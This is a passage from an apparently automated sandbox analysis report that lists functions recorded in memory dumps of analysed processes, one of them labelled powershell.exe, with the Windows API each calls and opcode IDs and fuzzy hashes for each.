                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 01C2ABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: 7261c912cb605209b867fb47a87fcd305bd0706eeaddcd8c809cea532e19cc2c
                                                                                            • Instruction ID: 9f97fdd5cc856b80d5917e3bc71ddf3e68f7d1e6fc2e269ab6a27b3928c18149
                                                                                            • Opcode Fuzzy Hash: 7261c912cb605209b867fb47a87fcd305bd0706eeaddcd8c809cea532e19cc2c
                                                                                            • Instruction Fuzzy Hash: AC01DC71404740DFEB10DF1AD889BA1FBA4EF04320F48C8ABDD098FA02D675E504CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D1116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 021D1148
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: e31ad6017f9a17a3a89b21bb1e6dad373ba4281f2285f5dcd0a04f2eff529b2b
                                                                                            • Instruction ID: 09165ac2e53e653b1d20ef822fbca6972085e3420ef67ec3bb78f4e8c768f1c5
                                                                                            • Opcode Fuzzy Hash: e31ad6017f9a17a3a89b21bb1e6dad373ba4281f2285f5dcd0a04f2eff529b2b
                                                                                            • Instruction Fuzzy Hash: F7F0A935544744EFEB20CF25D889766FBA4EF05A21F08C19ADD494B312D779A848CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: Flags
                                                                                            • String ID:
                                                                                            • API String ID: 3401871038-0
                                                                                            • Opcode ID: ea0af3546ebd04325d68e0c137064b341e639c4b11e4e29e880cba0d69d13e01
                                                                                            • Instruction ID: cd1e198cbaeaee8fef4fb09dc6b427262ac8a86b7c046bf2e68dc990fb88e9c0
                                                                                            • Opcode Fuzzy Hash: ea0af3546ebd04325d68e0c137064b341e639c4b11e4e29e880cba0d69d13e01
                                                                                            • Instruction Fuzzy Hash: 9DF0CD35504744DFEB20DF0AD889765FBA0EF04B21F08C19ADD494BB12D3B5E908CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 021D099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: 1beeaa545c5ba3b26d31df5c17f29d9d88f0cad9b55327922a486b8f87ff4c67
                                                                                            • Instruction ID: 2b0e5ed5a200b44c40e6ecd01669ccbf12bc776fdb9f8c6a0d726b302bca0280
                                                                                            • Opcode Fuzzy Hash: 1beeaa545c5ba3b26d31df5c17f29d9d88f0cad9b55327922a486b8f87ff4c67
                                                                                            • Instruction Fuzzy Hash: 05F02D34804700CFEF20CF06D888722FBA0EF18320F08C09ACD4D0B316C375A808CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 01C2AA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: 37832a3e53f37e85ec019fad6b664c94c7879342d046410310858a85fdb5bae4
                                                                                            • Instruction ID: 7b098fff1ad1485146aea8d0ce81b08be79ef72a712a93b493732a69d96575bf
                                                                                            • Opcode Fuzzy Hash: 37832a3e53f37e85ec019fad6b664c94c7879342d046410310858a85fdb5bae4
                                                                                            • Instruction Fuzzy Hash: 58F0CD31504B40CFEB20CF1AD98A761FBA0EF04621F08C09ADD094BA52D279E904CEA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 01C2A9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 2828ee095f6dee0859fda4adc56b5527d34799d50515a279cc2a99c7a4dfc435
                                                                                            • Instruction ID: c6c5a1b046f82d142fb507e3d092fe2d045b99be07c04d7071c5de63e506be55
                                                                                            • Opcode Fuzzy Hash: 2828ee095f6dee0859fda4adc56b5527d34799d50515a279cc2a99c7a4dfc435
                                                                                            • Instruction Fuzzy Hash: CE1191715093849FDB12CB25DC85B92FFA4DF02220F0984ABED858B263D275A908CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 01C2A9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: bbcd993be63d4474a7f6b3e05ae948fa799238a456af003e062b1df6e177259f
                                                                                            • Instruction ID: b99e7b543f028fc190812c9285adeface2d49e91cc14a58be01c6a73a23808f9
                                                                                            • Opcode Fuzzy Hash: bbcd993be63d4474a7f6b3e05ae948fa799238a456af003e062b1df6e177259f
                                                                                            • Instruction Fuzzy Hash: 2B01F275600780DFEB10DF1ADC857A6FB94DF04220F08C4ABDD098B642D675E904CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02AD0860, Relevance: .0, Instructions: 26COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2107941932.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9ee7de05fab298dbecd88fd7ae17b7d001e656135f5262aaa1e1e7aab10a6373
                                                                                            • Instruction ID: 7474f544d9d9f769bf2f95243c1aeabb4db13e3c3a51d046744fcbb08957340a
                                                                                            • Opcode Fuzzy Hash: 9ee7de05fab298dbecd88fd7ae17b7d001e656135f5262aaa1e1e7aab10a6373
                                                                                            • Instruction Fuzzy Hash: D5E01A2220E3D04FC3175778A8B4859BF728ED715430E46DBD192CF1A7C9584C49D3A3
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C223F4, Relevance: .0, Instructions: 15COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102084928.0000000001C22000.00000040.00000001.sdmp, Offset: 01C22000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2462c3c7dac3eaf83fa26cab5f8bccb2133902e9e1fdc411b9b0b3e9529d6860
                                                                                            • Instruction ID: 4de03714df3b63059b68ade1c6c87265e5bd92cb6aa6e97359dd5f3b112c4a73
                                                                                            • Opcode Fuzzy Hash: 2462c3c7dac3eaf83fa26cab5f8bccb2133902e9e1fdc411b9b0b3e9529d6860
                                                                                            • Instruction Fuzzy Hash: 8DD05E79204A918FE7168A1CC1A4B953BA4AF55B04F4644FAE840CB6A3C768E681E610
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C223BC, Relevance: .0, Instructions: 14COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102084928.0000000001C22000.00000040.00000001.sdmp, Offset: 01C22000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1c51f6129ab75bf1dee4d64fd898ed791bd33ac8b5fdc602098319e287145b9f
                                                                                            • Instruction ID: 74cc56b2d5b9b8587d1c0a6c1e11aa5b2151baf292c8ed6738aeff4b48716aca
                                                                                            • Opcode Fuzzy Hash: 1c51f6129ab75bf1dee4d64fd898ed791bd33ac8b5fdc602098319e287145b9f
                                                                                            • Instruction Fuzzy Hash: 49D05E383006818FEB19CA1CC194F5977E8AF40B00F0644E8FC008B266C3A4E980C600
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Analysis Process: powershell.exe PID: 2888 Parent PID: 1696 powershell.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 0269ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0269AD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: 43a08f55445173749a7b028330d62d11fae2fc8aad206b680226abba82097c3a
                                                                                            • Instruction ID: 0440738b107ca7a818dee743df3e467194ca618226dffb29e30ae9d182a31dc8
                                                                                            • Opcode Fuzzy Hash: 43a08f55445173749a7b028330d62d11fae2fc8aad206b680226abba82097c3a
                                                                                            • Instruction Fuzzy Hash: 9D2191755097849FDB12CF25DC44B92BFF8EF06210F08849AE9858B6A3D7719908DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0269AD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: 8df0b8a714c403e0ac053e27cdc1404a2f0390d83625d3944c911686b509b745
                                                                                            • Instruction ID: adced1ee0a08241b96c8c9610b96e51130a53024a6be56862a1117abc513862b
                                                                                            • Opcode Fuzzy Hash: 8df0b8a714c403e0ac053e27cdc1404a2f0390d83625d3944c911686b509b745
                                                                                            • Instruction Fuzzy Hash: 6F117075500704DFEF20CF59D884B56FBE8EF04621F08C46AED498B662DB31E818DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0269B329
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: 6b258823f25650ebd264faf5464e137918612f33dd7e579ac6df60c4545dbab6
                                                                                            • Instruction ID: 216a34cf590964ef7a0906a31ed1e109d3cc322149ddc9344287980ea25416ac
                                                                                            • Opcode Fuzzy Hash: 6b258823f25650ebd264faf5464e137918612f33dd7e579ac6df60c4545dbab6
                                                                                            • Instruction Fuzzy Hash: C511A071508384AFDB22CF11DC45F52FFB4EF06224F09849AEE894B662C275A818DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0269B329
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: b006d2546e3363772f8ad0aa5e15e6e30574f0af6e7d41cb81fc92ee7c75a431
                                                                                            • Instruction ID: 7fa65f31716e77f5fc82c279aa0c6974f40f980e190abb1b2364db7ad4cbbc49
                                                                                            • Opcode Fuzzy Hash: b006d2546e3363772f8ad0aa5e15e6e30574f0af6e7d41cb81fc92ee7c75a431
                                                                                            • Instruction Fuzzy Hash: 0701AD31500704DFEF20CF05E885B25FBA4EF04724F08C09ADE494B712C771A418DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02850118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 028501D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: b094870a074822ae91627595fc01836aef1843c7caf8315c86135c0f80cbfb6e
                                                                                            • Instruction ID: 872d83a107a6a2f79b7671e83e91fbb00a31dc21fda532855835fd6d7c91a05e
                                                                                            • Opcode Fuzzy Hash: b094870a074822ae91627595fc01836aef1843c7caf8315c86135c0f80cbfb6e
                                                                                            • Instruction Fuzzy Hash: 2D31396654E3C08FE7138B759C65692BFB4AF07310F0E84DBD884CF1A3D6659809D762
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0285067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0285072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 2077b260246abd6ad14bf6018c1a09ced44992097252b680885e6104adbc66fb
                                                                                            • Instruction ID: f0a3feac0845f527f410def7017effa8b9f7e2b3a4e16a4ce5c05edde645b7b2
                                                                                            • Opcode Fuzzy Hash: 2077b260246abd6ad14bf6018c1a09ced44992097252b680885e6104adbc66fb
                                                                                            • Instruction Fuzzy Hash: 01317075509380AFE722CF65CC45F56BFF8EF09350F09849EE989CB292D325A908CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02850D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 02850DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: c8adc4fb98bef9259c0d451f88455aea1b372f211b2344d43fc5b7384410e5c5
                                                                                            • Instruction ID: 182c263f883986afaf0b627d6d19be1070648d2332a601f81abf808a68cd8c20
                                                                                            • Opcode Fuzzy Hash: c8adc4fb98bef9259c0d451f88455aea1b372f211b2344d43fc5b7384410e5c5
                                                                                            • Instruction Fuzzy Hash: 0331D6B5509380AFE712CB25CC45B96BFE8DF06354F1884AAED48CB293D375A905C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,FE6A3AD0,00000000,00000000,00000000,00000000), ref: 0269AFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: 33143d7cfdc9a2d5de22b2e0fd68ae4e64b0bfca352c06181886401991dfde19
                                                                                            • Instruction ID: a8634c0512d48d4ba67abb3e3ced6547f9cba25c3a29bca069e59163a0189800
                                                                                            • Opcode Fuzzy Hash: 33143d7cfdc9a2d5de22b2e0fd68ae4e64b0bfca352c06181886401991dfde19
                                                                                            • Instruction Fuzzy Hash: 0D21F8B2509380AFEB12CF60DC45B96BFB8EF06324F0884DBE984DB193C625A905C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,FE6A3AD0,00000000,00000000,00000000,00000000), ref: 0269BDBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: 12239b7e916cfe799edc71ebe451cfa423082d7f3a1e1f001b9939cd9f2c91e6
                                                                                            • Instruction ID: b1ce1b2e80adae588775aab1497f47c36849509dce135d67a01463c77a61b34d
                                                                                            • Opcode Fuzzy Hash: 12239b7e916cfe799edc71ebe451cfa423082d7f3a1e1f001b9939cd9f2c91e6
                                                                                            • Instruction Fuzzy Hash: 5A31B471509384AFEB12CB60DC45F96BFBCEF06210F08849BE985CB192D624A908C7A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02850FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0285109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: 1b9dacaae64cd06d96aaa9832c118ef2eb9c2f4ea72d13b8563e1af50c8d7b33
                                                                                            • Instruction ID: cf382b3c6a15593ca01e6618f5331b1300f097a92b080aaed1555d76e4af9354
                                                                                            • Opcode Fuzzy Hash: 1b9dacaae64cd06d96aaa9832c118ef2eb9c2f4ea72d13b8563e1af50c8d7b33
                                                                                            • Instruction Fuzzy Hash: 883191B550E3C06FD3138B358C55B56BFB4AF43610F1A81CBD884CF2A3D228A909C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,FE6A3AD0,00000000,00000000,00000000,00000000), ref: 0269B0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: 4a81764efbcade270f08be1aa22f2f46bc5ad31129c0c9b57973789bbf2b012a
                                                                                            • Instruction ID: 53b9eff0617d72e0fa1ad041dd4092405a4a152429e3d00cc1f9fb0042fbb15d
                                                                                            • Opcode Fuzzy Hash: 4a81764efbcade270f08be1aa22f2f46bc5ad31129c0c9b57973789bbf2b012a
                                                                                            • Instruction Fuzzy Hash: 3521A371509384AFEB22CF15DC45FA6FFBCEF06224F08849AE945DB252D664E908CB71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02850784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,FE6A3AD0,00000000,00000000,00000000,00000000), ref: 02850819
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: bcc9bf3dec3b4593809c81431a094c3a0204b3da74c07353cbf93c1e0a6814bc
                                                                                            • Instruction ID: 7dacdf938e9c78f587e0ada02a7bdd38301c4ad21ffbb9eb5bfdf019490cee3b
                                                                                            • Opcode Fuzzy Hash: bcc9bf3dec3b4593809c81431a094c3a0204b3da74c07353cbf93c1e0a6814bc
                                                                                            • Instruction Fuzzy Hash: 9721F8B6508780AFE712CB159C41FA3BFA8EF46724F1881DAED848B193D224A905C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269A1A8, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0269A23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleCtrlHandler
                                                                                            • String ID:
                                                                                            • API String ID: 1513847179-0
                                                                                            • Opcode ID: acfabec186e1ca05d30f5383f85ae8ae774dcb77dbddaf6c48a5c8491183d80c
                                                                                            • Instruction ID: 514ad97984010ec6b5d9cf824d5d58eb08bbe2e651bc0cea86700091615c4a67
                                                                                            • Opcode Fuzzy Hash: acfabec186e1ca05d30f5383f85ae8ae774dcb77dbddaf6c48a5c8491183d80c
                                                                                            • Instruction Fuzzy Hash: 9121C47190D3C06FD312CB258C55B66FFB4EF47620F1981DBD8848F293D229A919CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02850464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02850502
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: 96842c4701c725996100abf43a7dd9ce4176aa45ec2ec4dd1d04209f1f1c1508
                                                                                            • Instruction ID: e8da409eb2a501bd68d612fbf9f65d5efb1658f8f4e9ef74d0e17a29b9d0c3d2
                                                                                            • Opcode Fuzzy Hash: 96842c4701c725996100abf43a7dd9ce4176aa45ec2ec4dd1d04209f1f1c1508
                                                                                            • Instruction Fuzzy Hash: 48217FB550E3C0AFD3128B358C55B66BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028506AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0285072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 61b49c2bd2fba35108d84e3b237830b188f7f7336e52293b730584a615e1837e
                                                                                            • Instruction ID: 0e17b7baa64b4281e845fd5a9066612cfe9dd05fc1bf3664055bed28cd60fd9e
                                                                                            • Opcode Fuzzy Hash: 61b49c2bd2fba35108d84e3b237830b188f7f7336e52293b730584a615e1837e
                                                                                            • Instruction Fuzzy Hash: 4D219C79500704EFEB20DF65CD85B66FBE8EF08750F14846AED49CA292D332E908CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02850854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,FE6A3AD0,00000000,00000000,00000000,00000000), ref: 028508E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: a2f7e1e7fbb3b3e21572da772224177d264860b1af624661986690bab5a65ac1
                                                                                            • Instruction ID: 31cca3ea5a095ea1a4f8bf6a6f30cb70d88125f8cd854a3d7bbbc70287d625a0
                                                                                            • Opcode Fuzzy Hash: a2f7e1e7fbb3b3e21572da772224177d264860b1af624661986690bab5a65ac1
                                                                                            • Instruction Fuzzy Hash: 5D219275509380AFEB22CF51DC45F96FFB8EF06314F09849BE9449B153C265A909CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0269A94A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: 2b5f923ac199bd5cb029766ae4d0301059913a2c7b3bb1c7944a9d3a51db1160
                                                                                            • Instruction ID: 5b5fc12da1057a4104f81d1c209d573949f1f918295c7952cfd6d0033a1c8b6d
                                                                                            • Opcode Fuzzy Hash: 2b5f923ac199bd5cb029766ae4d0301059913a2c7b3bb1c7944a9d3a51db1160
                                                                                            • Instruction Fuzzy Hash: 3821957550D780AFD3138B259C51B62BFB8EF87A10F1981DBEC848B653D224A919C7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02850D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 02850DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: f79343012a5caf57a0016ad5986a42d4ee24ea03bdfe98afb388bd5e2c91070e
                                                                                            • Instruction ID: 01a46c72d3c58e00f7e4f21d4fbcc9daa9761f8f6b9f18eee10021af6011049f
                                                                                            • Opcode Fuzzy Hash: f79343012a5caf57a0016ad5986a42d4ee24ea03bdfe98afb388bd5e2c91070e
                                                                                            • Instruction Fuzzy Hash: F921AEB5600204AFF720DF25CC85BA6FBD8EF08754F14856AED48DB282D775F804CA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,FE6A3AD0,00000000,00000000,00000000,00000000), ref: 0269BDBC
                                                                                            Memory Dump Source
